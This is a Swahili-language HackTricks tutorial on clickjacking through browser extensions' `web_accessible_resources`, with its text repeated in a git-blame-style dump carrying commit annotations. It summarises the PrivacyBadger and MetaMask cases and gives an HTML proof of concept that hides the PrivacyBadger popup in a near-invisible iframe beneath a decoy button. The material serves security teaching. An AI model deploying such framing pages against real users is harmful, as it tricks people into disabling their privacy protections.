hacktricks/pentesting-web/browser-extension-pentesting-methodology/browext-clickjacking.md

# BrowExt - ClickJacking

<details>

<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.

</details>

## Taarifa Msingi

Ukurasa huu utatumia udhaifu wa ClickJacking katika kivinjari cha kivinjari.\
Ikiwa haujui ni nini ClickJacking angalia:

{% content-ref url="../clickjacking.md" %}
[clickjacking.md](../clickjacking.md)
{% endcontent-ref %}

Vifaa vinavyoendelea vina faili **`manifest.json`** na faili hiyo ya JSON ina uga `web_accessible_resources`. Hapa kuna kile [nyaraka za Chrome](https://developer.chrome.com/extensions/manifest/web\_accessible\_resources) zinasema kuhusu hilo:

> Rasilimali hizi zitapatikana kwenye ukurasa wa wavuti kupitia URL **`chrome-extension://[PACKAGE ID]/[PATH]`**, ambayo inaweza kuzalishwa na **`njia ya extension.getURL`**. Rasilimali zilizoorodheshwa zinahudumiwa na vichwa sahihi vya CORS, hivyo wanapatikana kupitia mbinu kama XHR.[1](https://blog.lizzie.io/clickjacking-privacy-badger.html#fn.1)

**`web_accessible_resources`** katika kivinjari cha kivinjari sio tu inapatikana kupitia wavuti; pia inafanya kazi na mamlaka ya asili ya upanuzi. Hii inamaanisha kuwa ina uwezo wa:

* Badilisha hali ya upanuzi
* Pakia rasilimali zaidi
* Kutenda na kivinjari kwa kiwango fulani

Hata hivyo, kipengele hiki kinaweka hatari ya usalama. Ikiwa rasilimali ndani ya **`web_accessible_resources`** ina utendaji wowote muhimu, mkaidi anaweza kuingiza rasilimali hii kwenye ukurasa wa wavuti wa nje. Watumiaji wasio na shaka wanaotembelea ukurasa huu wanaweza kwa bahati mbaya kuamsha rasilimali hii iliyowekwa. Kuamsha kunaoweza kusababisha matokeo yasiyotarajiwa, kulingana na ruhusa na uwezo wa rasilimali za upanuzi.

## Mfano wa PrivacyBadger

Katika upanuzi wa PrivacyBadger, udhaifu uligunduliwa kuhusiana na saraka ya `skin/` kutangazwa kama `web_accessible_resources` kwa njia ifuatayo (Angalia chapisho la asili [blog](https://blog.lizzie.io/clickjacking-privacy-badger.html)):
```json
"web_accessible_resources": [
"skin/*",
"icons/*"
]
```
Hii usanidi ilisababisha shida ya usalama inayowezekana. Kwa usahihi, faili ya `skin/popup.html`, ambayo inaonyeshwa baada ya kuingiliana na ikoni ya PrivacyBadger kwenye kivinjari, inaweza kuingizwa ndani ya `iframe`. Kuingiza hii inaweza kutumika kudanganya watumiaji ili kwa bahati mbaya bonyeza "Zima PrivacyBadger kwa Tovuti hii". Hatua kama hiyo ingeathiri faragha ya mtumiaji kwa kulemaza ulinzi wa PrivacyBadger na huenda ikaweka mtumiaji katika hatari ya kufuatiliwa zaidi. Onyesho la kivutio cha kijidukuzi hiki linaweza kuonekana katika mfano wa video ya ClickJacking iliyotolewa kwenye [**https://blog.lizzie.io/clickjacking-privacy-badger/badger-fade.webm**](https://blog.lizzie.io/clickjacking-privacy-badger/badger-fade.webm).

Kushughulikia udhaifu huu, suluhisho rahisi lilitekelezwa: kuondoa `/skin/*` kutoka kwenye orodha ya `web_accessible_resources`. Mabadiliko haya yalipunguza hatari kwa kuhakikisha kwamba maudhui ya saraka ya `skin/` hayawezi kupatikana au kubadilishwa kupitia rasilimali zinazopatikana kwenye wavuti.

Suluhisho lilikuwa rahisi: **ondoa `/skin/*` kutoka kwa `web_accessible_resources`**.

### PoC
```html
<!--https://blog.lizzie.io/clickjacking-privacy-badger.html-->

<style>
iframe {
width: 430px;
height: 300px;
opacity: 0.01;
float: top;
position: absolute;
}

#stuff {
float: top;
position: absolute;
}

button {
float: top;
position: absolute;
top: 168px;
left: 100px;
}

</style>

<div id="stuff">
<h1>
Click the button
</h1>
<button id="button">
click me
</button>
</div>

<iframe src="chrome-extension://ablpimhddhnaldgkfbpafchflffallca/skin/popup.html">
</iframe>
```
## Mfano wa Metamask

[**Machapisho ya blogu kuhusu ClickJacking katika Metamask yanaweza kupatikana hapa**](https://slowmist.medium.com/metamask-clickjacking-vulnerability-analysis-f3e7c22ff4d9). Katika kesi hii, Metamask ilisuluhisha udhaifu kwa kuhakikisha kwamba itifaki iliyotumika kufikia ilikuwa **`https:`** au **`http:`** (sio **`chrome:`** kwa mfano):

<figure><img src="../../.gitbook/assets/image (21).png" alt=""><figcaption></figcaption></figure>

**Mwingine ClickJacking uliosuluhishwa** katika kifaa cha Metamask ilikuwa kwamba watumiaji walikuwa na uwezo wa **Bofya kuweka safi** wakati ukurasa ulionekana kuwa shuki kwa sababu ya `“web_accessible_resources”: [“inpage.js”, “phishing.html”]`. Kwa kuwa ukurasa huo ulikuwa na udhaifu wa Clickjacking, mshambuliaji angeweza kutumia hilo kuonyesha kitu cha kawaida ili kufanya muhanga abonyeze kuweka safi bila kugundua, na kisha kurudi kwenye ukurasa wa kuwinda ambao utakuwa umewekwa safi.

## Mfano wa Msaidizi wa Hazina ya Steam

Angalia ukurasa ufuatao kuona jinsi **XSS** katika kifaa cha kivinjari ilivyofungwa na udhaifu wa **ClickJacking**:

{% content-ref url="browext-xss-example.md" %}
[browext-xss-example.md](browext-xss-example.md)
{% endcontent-ref %}

## Marejeo

* [https://blog.lizzie.io/clickjacking-privacy-badger.html](https://blog.lizzie.io/clickjacking-privacy-badger.html)
* [https://slowmist.medium.com/metamask-clickjacking-vulnerability-analysis-f3e7c22ff4d9](https://slowmist.medium.com/metamask-clickjacking-vulnerability-analysis-f3e7c22ff4d9)
GITBOOK-4222: change request with no subject merged in GitBook 2023-12-27 23:58:16 +00:00			`# BrowExt - ClickJacking`

			`<details>`

Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat 2024-03-17 16:40:00 +00:00			`<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>`
GITBOOK-4222: change request with no subject merged in GitBook 2023-12-27 23:58:16 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Njia nyingine za kusaidia HackTricks:`
arte 2023-12-31 02:25:17 +01:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:47:30 +00:00			`* Ikiwa unataka kuona kampuni yako ikionekana kwenye HackTricks au kupakua HackTricks kwa PDF Angalia [MIPANGO YA USAJILI](https://github.com/sponsors/carlospolop)!`
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat 2024-03-17 16:40:00 +00:00			`* Pata [bidhaa rasmi za PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Gundua [Familia ya PEASS](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [NFTs](https://opensea.io/collection/the-peass-family) ya kipekee`
			`* Jiunge na 💬 [Kikundi cha Discord](https://discord.gg/hRep4RUj7f) au [kikundi cha telegram](https://t.me/peass) au tufuate kwenye Twitter 🐦 [@carlospolopm](https://twitter.com/hacktricks\_live).`
			`* Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa [HackTricks](https://github.com/carlospolop/hacktricks) na [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) repos za github.`
GITBOOK-4222: change request with no subject merged in GitBook 2023-12-27 23:58:16 +00:00
			`</details>`

Translated to Swahili 2024-02-11 02:13:58 +00:00			`## Taarifa Msingi`
GITBOOK-4222: change request with no subject merged in GitBook 2023-12-27 23:58:16 +00:00
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat 2024-03-17 16:40:00 +00:00			`Ukurasa huu utatumia udhaifu wa ClickJacking katika kivinjari cha kivinjari.\`
			`Ikiwa haujui ni nini ClickJacking angalia:`
GITBOOK-4222: change request with no subject merged in GitBook 2023-12-27 23:58:16 +00:00
			`{% content-ref url="../clickjacking.md" %}`
			`[clickjacking.md](../clickjacking.md)`
			`{% endcontent-ref %}`

Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:47:30 +00:00			Vifaa vinavyoendelea vina faili `manifest.json` na faili hiyo ya JSON ina uga `web_accessible_resources`. Hapa kuna kile [nyaraka za Chrome](https://developer.chrome.com/extensions/manifest/web\_accessible\_resources) zinasema kuhusu hilo:
GITBOOK-4222: change request with no subject merged in GitBook 2023-12-27 23:58:16 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:47:30 +00:00			> Rasilimali hizi zitapatikana kwenye ukurasa wa wavuti kupitia URL `chrome-extension://[PACKAGE ID]/[PATH]`, ambayo inaweza kuzalishwa na `njia ya extension.getURL`. Rasilimali zilizoorodheshwa zinahudumiwa na vichwa sahihi vya CORS, hivyo wanapatikana kupitia mbinu kama XHR.[1](https://blog.lizzie.io/clickjacking-privacy-badger.html#fn.1)
GITBOOK-4222: change request with no subject merged in GitBook 2023-12-27 23:58:16 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 03:36:12 +00:00			`web_accessible_resources` katika kivinjari cha kivinjari sio tu inapatikana kupitia wavuti; pia inafanya kazi na mamlaka ya asili ya upanuzi. Hii inamaanisha kuwa ina uwezo wa:
a 2024-02-06 04:10:38 +01:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:47:30 +00:00			`* Badilisha hali ya upanuzi`
			`* Pakia rasilimali zaidi`
			`* Kutenda na kivinjari kwa kiwango fulani`
a 2024-02-06 04:10:38 +01:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:47:30 +00:00			Hata hivyo, kipengele hiki kinaweka hatari ya usalama. Ikiwa rasilimali ndani ya `web_accessible_resources` ina utendaji wowote muhimu, mkaidi anaweza kuingiza rasilimali hii kwenye ukurasa wa wavuti wa nje. Watumiaji wasio na shaka wanaotembelea ukurasa huu wanaweza kwa bahati mbaya kuamsha rasilimali hii iliyowekwa. Kuamsha kunaoweza kusababisha matokeo yasiyotarajiwa, kulingana na ruhusa na uwezo wa rasilimali za upanuzi.
GITBOOK-4222: change request with no subject merged in GitBook 2023-12-27 23:58:16 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`## Mfano wa PrivacyBadger`
GITBOOK-4222: change request with no subject merged in GitBook 2023-12-27 23:58:16 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 03:36:12 +00:00			Katika upanuzi wa PrivacyBadger, udhaifu uligunduliwa kuhusiana na saraka ya `skin/` kutangazwa kama `web_accessible_resources` kwa njia ifuatayo (Angalia chapisho la asili [blog](https://blog.lizzie.io/clickjacking-privacy-badger.html)):
GITBOOK-4222: change request with no subject merged in GitBook 2023-12-27 23:58:16 +00:00			```json
			`"web_accessible_resources": [`
Translated to Swahili 2024-02-11 02:13:58 +00:00			`"skin/*",`
			`"icons/*"`
GITBOOK-4222: change request with no subject merged in GitBook 2023-12-27 23:58:16 +00:00			`]`
			```
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:47:30 +00:00			Hii usanidi ilisababisha shida ya usalama inayowezekana. Kwa usahihi, faili ya `skin/popup.html`, ambayo inaonyeshwa baada ya kuingiliana na ikoni ya PrivacyBadger kwenye kivinjari, inaweza kuingizwa ndani ya `iframe`. Kuingiza hii inaweza kutumika kudanganya watumiaji ili kwa bahati mbaya bonyeza "Zima PrivacyBadger kwa Tovuti hii". Hatua kama hiyo ingeathiri faragha ya mtumiaji kwa kulemaza ulinzi wa PrivacyBadger na huenda ikaweka mtumiaji katika hatari ya kufuatiliwa zaidi. Onyesho la kivutio cha kijidukuzi hiki linaweza kuonekana katika mfano wa video ya ClickJacking iliyotolewa kwenye [https://blog.lizzie.io/clickjacking-privacy-badger/badger-fade.webm](https://blog.lizzie.io/clickjacking-privacy-badger/badger-fade.webm).
GITBOOK-4222: change request with no subject merged in GitBook 2023-12-27 23:58:16 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:47:30 +00:00			Kushughulikia udhaifu huu, suluhisho rahisi lilitekelezwa: kuondoa `/skin/*` kutoka kwenye orodha ya `web_accessible_resources`. Mabadiliko haya yalipunguza hatari kwa kuhakikisha kwamba maudhui ya saraka ya `skin/` hayawezi kupatikana au kubadilishwa kupitia rasilimali zinazopatikana kwenye wavuti.
GITBOOK-4222: change request with no subject merged in GitBook 2023-12-27 23:58:16 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 03:36:12 +00:00			Suluhisho lilikuwa rahisi: *ondoa `/skin/` kutoka kwa `web_accessible_resources`**.
GITBOOK-4222: change request with no subject merged in GitBook 2023-12-27 23:58:16 +00:00
			`### PoC`
			```html
a 2024-02-06 04:10:38 +01:00			`<!--https://blog.lizzie.io/clickjacking-privacy-badger.html-->`

GITBOOK-4222: change request with no subject merged in GitBook 2023-12-27 23:58:16 +00:00			`<style>`
			`iframe {`
Translated to Swahili 2024-02-11 02:13:58 +00:00			`width: 430px;`
			`height: 300px;`
			`opacity: 0.01;`
			`float: top;`
			`position: absolute;`
GITBOOK-4222: change request with no subject merged in GitBook 2023-12-27 23:58:16 +00:00			`}`

			`#stuff {`
Translated to Swahili 2024-02-11 02:13:58 +00:00			`float: top;`
			`position: absolute;`
GITBOOK-4222: change request with no subject merged in GitBook 2023-12-27 23:58:16 +00:00			`}`

			`button {`
Translated to Swahili 2024-02-11 02:13:58 +00:00			`float: top;`
			`position: absolute;`
			`top: 168px;`
			`left: 100px;`
GITBOOK-4222: change request with no subject merged in GitBook 2023-12-27 23:58:16 +00:00			`}`

			`</style>`

			`<div id="stuff">`
Translated to Swahili 2024-02-11 02:13:58 +00:00			`<h1>`
			`Click the button`
			`</h1>`
			`<button id="button">`
			`click me`
			`</button>`
GITBOOK-4222: change request with no subject merged in GitBook 2023-12-27 23:58:16 +00:00			`</div>`

			`<iframe src="chrome-extension://ablpimhddhnaldgkfbpafchflffallca/skin/popup.html">`
			`</iframe>`
			```
Translated to Swahili 2024-02-11 02:13:58 +00:00			`## Mfano wa Metamask`
GITBOOK-4222: change request with no subject merged in GitBook 2023-12-27 23:58:16 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:47:30 +00:00			[Machapisho ya blogu kuhusu ClickJacking katika Metamask yanaweza kupatikana hapa](https://slowmist.medium.com/metamask-clickjacking-vulnerability-analysis-f3e7c22ff4d9). Katika kesi hii, Metamask ilisuluhisha udhaifu kwa kuhakikisha kwamba itifaki iliyotumika kufikia ilikuwa `https:` au `http:` (sio `chrome:` kwa mfano):
GITBOOK-4222: change request with no subject merged in GitBook 2023-12-27 23:58:16 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:47:30 +00:00			`<figure><img src="../../.gitbook/assets/image (21).png" alt=""><figcaption></figcaption></figure>`
GITBOOK-4222: change request with no subject merged in GitBook 2023-12-27 23:58:16 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:47:30 +00:00			Mwingine ClickJacking uliosuluhishwa katika kifaa cha Metamask ilikuwa kwamba watumiaji walikuwa na uwezo wa Bofya kuweka safi wakati ukurasa ulionekana kuwa shuki kwa sababu ya `“web_accessible_resources”: [“inpage.js”, “phishing.html”]`. Kwa kuwa ukurasa huo ulikuwa na udhaifu wa Clickjacking, mshambuliaji angeweza kutumia hilo kuonyesha kitu cha kawaida ili kufanya muhanga abonyeze kuweka safi bila kugundua, na kisha kurudi kwenye ukurasa wa kuwinda ambao utakuwa umewekwa safi.
GITBOOK-4222: change request with no subject merged in GitBook 2023-12-27 23:58:16 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:47:30 +00:00			`## Mfano wa Msaidizi wa Hazina ya Steam`
GITBOOK-4222: change request with no subject merged in GitBook 2023-12-27 23:58:16 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:47:30 +00:00			`Angalia ukurasa ufuatao kuona jinsi XSS katika kifaa cha kivinjari ilivyofungwa na udhaifu wa ClickJacking:`
GITBOOK-4222: change request with no subject merged in GitBook 2023-12-27 23:58:16 +00:00
			`{% content-ref url="browext-xss-example.md" %}`
			`[browext-xss-example.md](browext-xss-example.md)`
			`{% endcontent-ref %}`

Translated to Swahili 2024-02-11 02:13:58 +00:00			`## Marejeo`
GITBOOK-4222: change request with no subject merged in GitBook 2023-12-27 23:58:16 +00:00
			`* [https://blog.lizzie.io/clickjacking-privacy-badger.html](https://blog.lizzie.io/clickjacking-privacy-badger.html)`
a 2024-02-06 04:10:38 +01:00			`* [https://slowmist.medium.com/metamask-clickjacking-vulnerability-analysis-f3e7c22ff4d9](https://slowmist.medium.com/metamask-clickjacking-vulnerability-analysis-f3e7c22ff4d9)`